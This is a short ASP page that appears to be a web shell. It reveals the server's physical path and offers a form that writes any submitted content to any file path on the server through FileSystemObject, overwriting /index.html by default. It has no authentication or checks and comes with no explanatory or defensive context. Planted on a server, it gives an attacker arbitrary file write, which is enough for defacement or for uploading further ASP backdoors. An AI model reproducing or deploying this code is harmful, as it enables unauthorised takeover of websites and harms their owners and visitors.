<style type="text/css" >
<!--
body {
margin-left: 4px;
margin-top: 3px;
margin-right: 0px;
margin-bottom: 0px;
}
body,td,th {
font-size: 12px;
}
-- >
</style > </head >
<body >
<%=request.servervariables("appl_physical_path")% >
<form name="form1" method="post" action="save.asp" style="width:500px" >
<input name="url" type="text" style="width:500px;" >
<textarea name="content" style="width:500px;height:500px;" > </textarea >
<input name="sub" type="submit" >
</form >
<%
if request.form("content") < > "" then
set fso = server.createobject("scripting.filesystemobject")
if request.form("url") = "" then
set fout = fso.createtextfile(server.mappath("/index.html"))
else
url = request.form("url")
set fout = fso.createtextfile(""&url&"")
end if
fout.write request("content")
end if
% >